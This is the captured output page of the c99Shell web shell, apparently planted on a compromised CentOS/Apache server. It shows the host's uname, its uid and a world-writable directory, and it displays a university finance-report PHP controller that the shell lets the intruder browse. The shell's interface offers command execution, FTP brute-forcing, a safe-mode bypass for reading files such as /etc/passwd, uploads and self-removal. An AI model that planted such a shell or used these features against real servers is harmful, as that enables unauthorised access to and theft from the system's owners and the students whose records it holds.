!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/application/controllers/eregis-12022565/   drwxrwxrwx
Free 51 GB of 127.8 GB (39.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     rpt_finance.php (12.9 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include('rg_controller.php');
class 
Rpt_finance extends Rg_controller {
//    function __construct() {
//        parent::__construct();
//    }

    //**********************************************************//
    
public function searchRptRis301() {
        
$this->load->model($this->config->item("rg_folder").'mo_rg_termconfig','tc');
        
$this->load->model($this->config->item("rg_folder").'mo_rg_term','tm');
        
$tm $this->tc->getBetweenDateByNowDate(date('Y/m/d'))->row();
        
$this->contents['rs_tm'] = $this->tm->get_options('','','','');
        
$this->contents['acY'] = $tm->tmcAcY;
        
$this->contents['tmId'] = $tm->tmcTmId;
        
$this->output($this->config->item("rg_folder")."v_searchRptRis301");
    }


    public function 
rptRis301() {
        
$this->load->library('form_validation');
        
$this->form_validation->set_error_delimiters('<div class="error">','</div>');
        
$this->form_validation->set_rules('acY',' ','callback_checkAdY');
        
$this->form_validation->set_rules('tmId',' ','');

        if(
$this->form_validation->run() == true) {

            
$this->load->model($this->config->item('rg_folder').'mo_rg_commonfeetp','cmft');
            
$this->load->model($this->config->item('rg_folder').'mo_rg_student','stu');
            
$this->load->model($this->config->item('rg_folder').'mo_rg_curriculum','cc');
            
$this->load->model($this->config->item('rg_folder').'mo_rg_generation','gen');
            
$this->load->model($this->config->item('rg_folder').'mo_rg_curriculumfeetp','ccfp');
            
$this->load->model($this->config->item('rg_folder').'mo_rg_coursefeetp','crft');
            
$this->load->model($this->config->item('rg_folder').'mo_rg_studyplan','stpn');
            
$cond_tb_head = array( 'cmftAcY'=>$this->input->post('acY'),
                            
'cmftTmId'=>$this->input->post('tmId'),
                            
'cmftIsDom'=>'n'
            
);
            
$tb_head $this->cmft->qryCmftJoinFee($cond_tb_head);
            
$num_col $tb_head->num_rows();
            
$rs_sg $this->stu->rsSutGen($this->input->post('acY'));
            
$cond_ccfp = array('cftAcY'=>$this->input->post('acY'),'cftTmId'=>$this->input->post('tmId'));
            
$ccf $this->ccfp->qryCft($cond_ccfp);
            
$i 0;
            
$sumSt 0;
            
$sumProgramFeeArr = array();
            
$sumLcCreditFee 0;
            
$sumLbCreditFee 0;
            
$sumTotal 0;
            
$tb_data = array();
            foreach(
$rs_sg->result() as $row)
            {
                
$sumCommonFeeR 0;
                
$sumProgramFeeR 0;
                
$temp = array();
                
$tb_data[$i]['curName'] = $row->curName;
                
$tb_data[$i]['genNo'] = $row->genNo;
                
$tb_data[$i]['numStd'] = $row->numStd;
                
$sumSt += $row->numStd;
                foreach(
$tb_head->result() as $col)
                {
                    
$temp[] = $col->cmftAmt $row->numStd;
                    
$sumProgramFeeR += $col->cmftAmt $row->numStd;
                }
                
$tb_data[$i]['extra'] = $temp
                
$temp2 = array();
                
$cond_ccfp = array(
                    
'cftCurId'=>$row->stdCurId,
                    
'cftAcY' =>$this->input->post('acY'),
                    
'cftTmId' =>$this->input->post('tmId')
                );
                foreach(
$ccf->result() as $srow)
                {    
                    
$cond_ccfp['ctfFeeId'] = $srow->cftFeeId;
                    
$temp2[] = $this->ccfp->qryCft($cond_ccfp);
                }
                
$cond_crft= array('crftCurId'=>$row->stdCurId,
                                  
'crftAdY'=>$this->input->post('acY'),
                                  
'crftTmId'=>$this->input->post('tmId')
                );
                
$crf $this->crft->qryCrft($cond_crft)->row();

                
$cond_stpn = array('spCurId'=>$row->stdCurId,
                                    
'spSyId'=>$this->input->post('acY')-$row->stdAdY+1,
                                    
'spTmId'=>$this->input->post('tmId')
                );

                
$tmpLcCreditFee = ((isset($crf->crftLecCreditFee))?$crf->crftLecCreditFee:0) * $this->stpn->qrySumCrsCreditTotal($cond_stpn) * $row->numStd;
                
$tmpLbCreditFee = ((isset($crf->crftLabCreditFee))?$crf->crftLabCreditFee:0) *$this->stpn->qrySumCrsCredit2($cond_stpn)* $row->numStd;
                
$tb_data[$i]['tmpLcCreditFee'] = $tmpLcCreditFee;
                
$tb_data[$i]['tmpLbCreditFee'] = $tmpLbCreditFee;
                
$sumLcCreditFee += $tmpLcCreditFee;
                
$sumLbCreditFee += $tmpLbCreditFee;
                
$tb_data[$i++]['total'] = $sumCommonFeeR $sumProgramFeeR $tmpLcCreditFee $tmpLbCreditFee;
                
//$sumTotal += $tb_data[$i++]['total'] ;

            
}
            
$this->contents['num_col'] = $num_col;
            
$this->contents['sum_std'] = $sumSt;
            
$this->contents['sum_total'] = $sumTotal;
            
$this->contents['rs_sg'] = $tb_data;
            
$this->contents['tb_head'] = $tb_head;
            
$this->contents['semester'] = $this->input->post('tmId');
            
$this->contents['acadYear'] = $this->input->post('acY');
            
$this->output_detail($this->config->item("rg_folder")."v_rptRis301");
        } else {
            
$this->searchRptRis301();
        }
    }

    public function 
searchRptRis302() {
        
$this->load->model($this->config->item("rg_folder").'mo_rg_termconfig','tc');
        
$this->load->model($this->config->item("rg_folder").'mo_rg_term','tm');
        
$tm $this->tc->getBetweenDateByNowDate(date('Y/m/d'))->row();
        
$this->contents['rs_tm'] = $this->tm->get_options('','','','');
        
$this->contents['acY'] = $tm->tmcAcY;
        
$this->contents['tmId'] = $tm->tmcTmId;
        
$this->output($this->config->item("rg_folder")."v_searchRptRis302");
    }


    public function 
rptRis302() {

        
$this->load->library('form_validation');
        
$this->form_validation->set_error_delimiters('<div class="error">','</div>');
        
$this->form_validation->set_rules('acY',' ','callback_checkAdY');
        
$this->form_validation->set_rules('tmId',' ','');

        if(
$this->form_validation->run() == true) {

            
$this->load->model($this->config->item('rg_folder').'mo_rg_student','std');
            
$this->load->model($this->config->item('rg_folder').'mo_rg_registfee','rf');

            
$this->contents['rs_std'] = $this->std->rsSutGen($this->input->post('acY'));

            
$this->contents['tmId'] = $this->input->post('tmId');
            
$this->contents['acY'] = $this->input->post('acY');
            
$this->contents['rf'] = $this->rf;

            
$this->output_detail($this->config->item("rg_folder")."v_rptRis302");
        } else {
            
$this->searchRptRis302();
        }
    }


    public function 
searchRptRis303() {
        
$this->load->model($this->config->item("rg_folder").'mo_rg_termconfig','tmc');
        
$this->load->model($this->config->item("rg_folder").'mo_rg_term','tm');
        
$tm $this->tmc->getBetweenDateByNowDate(date('Y/m/d'))->row();
        
$this->contents['rs_tm'] = $this->tm->get_options('','','','');
        
$this->contents['acY'] = $tm->tmcAcY;
        
$this->contents['tmId'] = $tm->tmcTmId;
        
$this->output($this->config->item("rg_folder")."v_searchRptRis303");
    }


    public function 
rptRis303() {

        
$this->load->library('form_validation');
        
$this->form_validation->set_error_delimiters('<div class="error">','</div>');
        
$this->form_validation->set_rules('curId'' ''callback_checkselect');
        
$this->form_validation->set_rules('curName'' ''');
        
$this->form_validation->set_rules('adY',' ','callback_checkAdY');
        
$this->form_validation->set_rules('tmcAcY'' ''callback_checkAcY');
        
$this->form_validation->set_rules('stdSyId',' ','callback_checkSyId');
        
$this->form_validation->set_rules('tmId',' ','');

        if(
$this->form_validation->run() == true) {

            
$this->load->model($this->config->item('rg_folder').'mo_rg_student','std');
            
$this->load->model($this->config->item('rg_folder').'mo_rg_registfee','rf');

            
$std_con = array(    'stdCurId'    => $this->input->post('curId'),
                                
'stdSyId'    => $this->input->post('stdSyId'),
                                
'stdAdy'    => $this->input->post('adY'));

            
$this->contents['rs_std'] = $this->std->qryStdJoinPfCurGen($std_con,"","");
            
//ภาคการศึกษา
            
$this->contents['tmId'] = $this->input->post('tmId');
            
//ปีการศึกษาที่เข้า
            
$this->contents['adY'] = $this->input->post('adY');
            
//ปีการศึกษา
            
$this->contents['acY'] = $this->input->post('tmcAcY');
            
//ชั้นปี
            
$this->contents['stdSyId'] = $this->input->post('stdSyId');

            
$this->contents['rf'] = $this->rf;

            
$this->output_detail($this->config->item("rg_folder")."v_rptRis303");    
        } else {
            
$this->searchRptRis303();
        }
    }

    public function 
searchRptRis304() {
        
$this->load->model($this->config->item("rg_folder").'mo_rg_termconfig','tmc');
        
$this->load->model($this->config->item("rg_folder").'mo_rg_term','tm');
        
$tm $this->tmc->getBetweenDateByNowDate(date('Y/m/d'))->row();
        
$this->contents['rs_tm'] = $this->tm->get_options('','','','');
        
$this->contents['acY'] = $tm->tmcAcY;
        
$this->contents['tmId'] = $tm->tmcTmId;
        
$this->output($this->config->item("rg_folder")."v_searchRptRis304");
    }


    public function 
rptRis304() {
        
$this->load->library('form_validation');
        
$this->form_validation->set_error_delimiters('<div class="error">','</div>');
        
$this->form_validation->set_rules('curId'' ''callback_checkselect');
        
$this->form_validation->set_rules('curName'' ''');
        
$this->form_validation->set_rules('adY',' ','callback_checkAdY');
        
$this->form_validation->set_rules('tmcAcY'' ''callback_checkAcY');
        
$this->form_validation->set_rules('stdSyId',' ','callback_checkSyId');
        
$this->form_validation->set_rules('tmId',' ','');

        if(
$this->form_validation->run() == true) {

            
$this->load->model($this->config->item('rg_folder').'mo_rg_student','std');
            
$this->load->model($this->config->item('rg_folder').'mo_rg_registfee','rf');

            
$std_con = array(    'stdCurId'    => $this->input->post('curId'),
                                
'stdSyId'    => $this->input->post('stdSyId'),
                                
'stdAdy'    => $this->input->post('adY'));

            
$this->contents['rs_std'] = $this->std->qryStdJoinPfCurGen($std_con,"","");
            
//ภาคการศึกษา
            
$this->contents['tmId'] = $this->input->post('tmId');
            
//ปีการศึกษาที่เข้า
            
$this->contents['adY'] = $this->input->post('adY');
            
//ปีการศึกษา
            
$this->contents['acY'] = $this->input->post('tmcAcY');
            
//ชั้นปี
            
$this->contents['stdSyId'] = $this->input->post('stdSyId');

            
$this->contents['rf'] = $this->rf;

            
$this->output_detail($this->config->item("rg_folder")."v_rptRis304");    
        } else {
            
$this->searchRptRis304();
        }
    }

    public function 
searchRptRis996() {
        
$this->output($this->config->item("rg_folder")."v_searchRptRis996");
    }


    public function 
rptRis996() {
        
$this->load->library('form_validation');
        
$this->form_validation->set_error_delimiters('<div class="error">','</div>');
        
$this->form_validation->set_rules('startDate'' ''trim|required|xss_clean');
        
$this->form_validation->set_rules('endDate'' ''trim|required|xss_clean');

        if(
$this->form_validation->run() == true) {

            
$this->load->model($this->config->item('rg_folder').'mo_rg_payment','pm');
            
$startDate    $this->input->post('startDate');
            
$endDate    $this->input->post('endDate');
            
$this->contents['rs_pm'] = $this->pm->getPmBetweenpmDate(splitDateForm2($startDate),splitDateForm2($endDate));

            
$this->contents['startDate'] = $startDate;
            
$this->contents['endDate'] = $endDate;
            
$this->contents['pm'] = $this->pm;

            
$this->output_detail($this->config->item("rg_folder")."v_rptRis996");    
        } else {
            
$this->searchRptRis996();
        }
    }


    public function 
searchRptRis997() {
        
$this->output($this->config->item("rg_folder")."v_searchRptRis997");
    }


    public function 
rptRis997() {
        
$this->load->library('form_validation');
        
$this->form_validation->set_error_delimiters('<div class="error">','</div>');
        
$this->form_validation->set_rules('startDate'' ''trim|required|xss_clean');
        
$this->form_validation->set_rules('endDate'' ''trim|required|xss_clean');

        if(
$this->form_validation->run() == true) {

            
$this->load->model($this->config->item('rg_folder').'mo_rg_payment','pm');
            
$startDate    $this->input->post('startDate');
            
$endDate    $this->input->post('endDate');
            
$pm_group = array('pmDate' => 'pmDate');
            
$this->contents['rs_pm'] = $this->pm->getPmBetweenpmDate(splitDateForm2($startDate),splitDateForm2($endDate),$pm_group);

            
$this->contents['startDate'] = $startDate;
            
$this->contents['endDate'] = $endDate;
            
$this->contents['pm'] = $this->pm;

            
$this->output_detail($this->config->item("rg_folder")."v_rptRis997");    
        } else {
            
$this->searchRptRis997();
        }
    }


    public function 
searchRptRis998() {
        
$this->output($this->config->item("rg_folder")."v_searchRptRis998");
    }


    public function 
rptRis998() {
        
$this->load->library('form_validation');
        
$this->form_validation->set_error_delimiters('<div class="error">','</div>');
        
$this->form_validation->set_rules('startDate'' ''trim|required|xss_clean');
        
$this->form_validation->set_rules('endDate'' ''trim|required|xss_clean');

        if(
$this->form_validation->run() == true) {
            
$this->load->model($this->config->item('rg_folder').'mo_rg_commonFee','cmf');
            
$this->load->model($this->config->item('rg_folder').'mo_rg_courseFee','crf');
            
$this->load->model($this->config->item('rg_folder').'mo_rg_curriculumFee','cf');
            
$this->load->model($this->config->item('rg_folder').'mo_rg_payment','pm');
            
$startDate    $this->input->post('startDate');
            
$endDate    $this->input->post('endDate');
            
$this->contents['rs_pm'] = $this->pm->getPmJoinRf(splitDateForm2($startDate),splitDateForm2($endDate));

            
$this->contents['startDate'] = $startDate;
            
$this->contents['endDate'] = $endDate;
            
$this->contents['cmf'] = $this->cmf;
            
$this->contents['crf'] = $this->crf;
            
$this->contents['cf'] = $this->cf;

            
$this->output_detail($this->config->item("rg_folder")."v_rptRis998");    
        } else {
            
$this->searchRptRis998();
        }
    }


}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0418 ]--